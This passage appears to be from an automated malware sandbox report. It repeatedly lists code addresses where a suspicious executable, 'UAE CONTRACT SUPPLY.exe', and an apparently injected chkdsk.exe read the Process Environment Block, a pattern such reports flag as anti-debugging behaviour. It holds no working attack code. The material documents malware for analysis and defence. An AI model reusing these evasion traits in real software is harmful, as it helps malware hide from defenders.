      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F20A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov ecx, dword ptr fs:[00000030h]3_2_1E4FF0BF
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]3_2_1E4FF0BF
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]3_2_1E4FF0BF
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5090AF mov eax, dword ptr fs:[00000030h]3_2_1E5090AF
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]3_2_1E4EB944
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]3_2_1E4EB944
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC962 mov eax, dword ptr fs:[00000030h]3_2_1E4CC962
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]3_2_1E4CB171
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]3_2_1E4CB171
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]3_2_1E4C9100
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]3_2_1E4C9100
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]3_2_1E4C9100
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]3_2_1E4E4120
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]3_2_1E4E4120
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]3_2_1E4E4120
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]3_2_1E4E4120
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4E4120 mov ecx, dword ptr fs:[00000030h]3_2_1E4E4120
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]3_2_1E4F513A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]3_2_1E4F513A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]3_2_1E4CB1E1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]3_2_1E4CB1E1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CB1E1 mov eax, dword ptr fs:[00000030h]3_2_1E4CB1E1
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5541E8 mov eax, dword ptr fs:[00000030h]3_2_1E5541E8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA185 mov eax, dword ptr fs:[00000030h]3_2_1E4FA185
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EC182 mov eax, dword ptr fs:[00000030h]3_2_1E4EC182
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F2990 mov eax, dword ptr fs:[00000030h]3_2_1E4F2990
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]3_2_1E5451BE
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]3_2_1E5451BE
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]3_2_1E5451BE
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5451BE mov eax, dword ptr fs:[00000030h]3_2_1E5451BE
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F61A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F61A0 mov eax, dword ptr fs:[00000030h]3_2_1E4F61A0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5469A6 mov eax, dword ptr fs:[00000030h]3_2_1E5469A6
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00562CD6 mov eax, dword ptr fs:[00000030h]3_2_00562CD6
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005658DB mov eax, dword ptr fs:[00000030h]3_2_005658DB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005658C3 mov eax, dword ptr fs:[00000030h]3_2_005658C3
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00564B16 mov eax, dword ptr fs:[00000030h]3_2_00564B16
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_00564FBF mov eax, dword ptr fs:[00000030h]3_2_00564FBF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]16_2_056DC577
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DC577 mov eax, dword ptr fs:[00000030h]16_2_056DC577
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F3D43 mov eax, dword ptr fs:[00000030h]16_2_056F3D43
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05733540 mov eax, dword ptr fs:[00000030h]16_2_05733540
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05763D40 mov eax, dword ptr fs:[00000030h]16_2_05763D40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D7D50 mov eax, dword ptr fs:[00000030h]16_2_056D7D50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0573A537 mov eax, dword ptr fs:[00000030h]16_2_0573A537
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788D34 mov eax, dword ptr fs:[00000030h]16_2_05788D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577E539 mov eax, dword ptr fs:[00000030h]16_2_0577E539
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]16_2_056E4D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]16_2_056E4D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E4D3B mov eax, dword ptr fs:[00000030h]16_2_056E4D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C3D34 mov eax, dword ptr fs:[00000030h]16_2_056C3D34
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BAD30 mov eax, dword ptr fs:[00000030h]16_2_056BAD30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05768DF1 mov eax, dword ptr fs:[00000030h]16_2_05768DF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]16_2_056CD5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CD5E0 mov eax, dword ptr fs:[00000030h]16_2_056CD5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]16_2_0577FDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]16_2_0577FDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]16_2_0577FDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577FDE2 mov eax, dword ptr fs:[00000030h]16_2_0577FDE2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]16_2_05736DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]16_2_05736DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]16_2_05736DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov ecx, dword ptr fs:[00000030h]16_2_05736DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]16_2_05736DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736DC9 mov eax, dword ptr fs:[00000030h]16_2_05736DC9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E35A1 mov eax, dword ptr fs:[00000030h]16_2_056E35A1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]16_2_057805AC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057805AC mov eax, dword ptr fs:[00000030h]16_2_057805AC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]16_2_056E1DB5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]16_2_056E1DB5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E1DB5 mov eax, dword ptr fs:[00000030h]16_2_056E1DB5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]16_2_056B2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]16_2_056B2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]16_2_056B2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]16_2_056B2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B2D8A mov eax, dword ptr fs:[00000030h]16_2_056B2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]16_2_056E2581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]16_2_056E2581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]16_2_056E2581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E2581 mov eax, dword ptr fs:[00000030h]16_2_056E2581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]16_2_056EFD9B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EFD9B mov eax, dword ptr fs:[00000030h]16_2_056EFD9B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D746D mov eax, dword ptr fs:[00000030h]16_2_056D746D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]16_2_0574C450
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574C450 mov eax, dword ptr fs:[00000030h]16_2_0574C450
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA44B mov eax, dword ptr fs:[00000030h]16_2_056EA44B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EBC2C mov eax, dword ptr fs:[00000030h]16_2_056EBC2C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771C06 mov eax, dword ptr fs:[00000030h]16_2_05771C06
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]16_2_0578740D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]16_2_0578740D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578740D mov eax, dword ptr fs:[00000030h]16_2_0578740D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]16_2_05736C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]16_2_05736C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]16_2_05736C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736C0A mov eax, dword ptr fs:[00000030h]16_2_05736C0A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]16_2_05736CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]16_2_05736CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05736CF0 mov eax, dword ptr fs:[00000030h]16_2_05736CF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057714FB mov eax, dword ptr fs:[00000030h]16_2_057714FB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788CD6 mov eax, dword ptr fs:[00000030h]16_2_05788CD6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C849B mov eax, dword ptr fs:[00000030h]16_2_056C849B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CFF60 mov eax, dword ptr fs:[00000030h]16_2_056CFF60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788F6A mov eax, dword ptr fs:[00000030h]16_2_05788F6A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056CEF40 mov eax, dword ptr fs:[00000030h]16_2_056CEF40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]16_2_056B4F2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B4F2E mov eax, dword ptr fs:[00000030h]16_2_056B4F2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EE730 mov eax, dword ptr fs:[00000030h]16_2_056EE730
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]16_2_056EA70E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA70E mov eax, dword ptr fs:[00000030h]16_2_056EA70E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]16_2_0574FF10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FF10 mov eax, dword ptr fs:[00000030h]16_2_0574FF10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]16_2_0578070D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0578070D mov eax, dword ptr fs:[00000030h]16_2_0578070D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DF716 mov eax, dword ptr fs:[00000030h]16_2_056DF716
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F37F5 mov eax, dword ptr fs:[00000030h]16_2_056F37F5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]16_2_05737794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]16_2_05737794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05737794 mov eax, dword ptr fs:[00000030h]16_2_05737794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C8794 mov eax, dword ptr fs:[00000030h]16_2_056C8794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C766D mov eax, dword ptr fs:[00000030h]16_2_056C766D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]16_2_056DAE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]16_2_056DAE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]16_2_056DAE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]16_2_056DAE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DAE73 mov eax, dword ptr fs:[00000030h]16_2_056DAE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]16_2_056C7E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]16_2_056C7E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]16_2_056C7E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]16_2_056C7E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]16_2_056C7E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C7E41 mov eax, dword ptr fs:[00000030h]16_2_056C7E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]16_2_0577AE44
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0577AE44 mov eax, dword ptr fs:[00000030h]16_2_0577AE44
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FE3F mov eax, dword ptr fs:[00000030h]16_2_0576FE3F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BE620 mov eax, dword ptr fs:[00000030h]16_2_056BE620
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]16_2_056BC600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]16_2_056BC600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC600 mov eax, dword ptr fs:[00000030h]16_2_056BC600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E8E00 mov eax, dword ptr fs:[00000030h]16_2_056E8E00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]16_2_056EA61C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056EA61C mov eax, dword ptr fs:[00000030h]16_2_056EA61C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05771608 mov eax, dword ptr fs:[00000030h]16_2_05771608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E16E0 mov ecx, dword ptr fs:[00000030h]16_2_056E16E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056C76E2 mov eax, dword ptr fs:[00000030h]16_2_056C76E2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E36CC mov eax, dword ptr fs:[00000030h]16_2_056E36CC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056F8EC7 mov eax, dword ptr fs:[00000030h]16_2_056F8EC7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05788ED6 mov eax, dword ptr fs:[00000030h]16_2_05788ED6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0576FEC0 mov eax, dword ptr fs:[00000030h]16_2_0576FEC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057346A7 mov eax, dword ptr fs:[00000030h]16_2_057346A7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]16_2_05780EA5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]16_2_05780EA5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05780EA5 mov eax, dword ptr fs:[00000030h]16_2_05780EA5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0574FE87 mov eax, dword ptr fs:[00000030h]16_2_0574FE87
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BC962 mov eax, dword ptr fs:[00000030h]16_2_056BC962
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]16_2_056BB171
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB171 mov eax, dword ptr fs:[00000030h]16_2_056BB171
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]16_2_056DB944
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056DB944 mov eax, dword ptr fs:[00000030h]16_2_056DB944
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]16_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]16_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]16_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov eax, dword ptr fs:[00000030h]16_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056D4120 mov ecx, dword ptr fs:[00000030h]16_2_056D4120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]16_2_056E513A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E513A mov eax, dword ptr fs:[00000030h]16_2_056E513A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]16_2_056B9100
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]16_2_056B9100
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056B9100 mov eax, dword ptr fs:[00000030h]16_2_056B9100
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]16_2_056BB1E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]16_2_056BB1E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056BB1E1 mov eax, dword ptr fs:[00000030h]16_2_056BB1E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057441E8 mov eax, dword ptr fs:[00000030h]16_2_057441E8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]16_2_057351BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]16_2_057351BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]16_2_057351BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057351BE mov eax, dword ptr fs:[00000030h]16_2_057351BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]16_2_056E61A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_056E61A0 mov eax, dword ptr fs:[00000030h]16_2_056E61A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]16_2_057749A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]16_2_057749A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]16_2_057749A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_057749A4 mov eax, dword ptr fs:[00000030h]16_2_057749A4
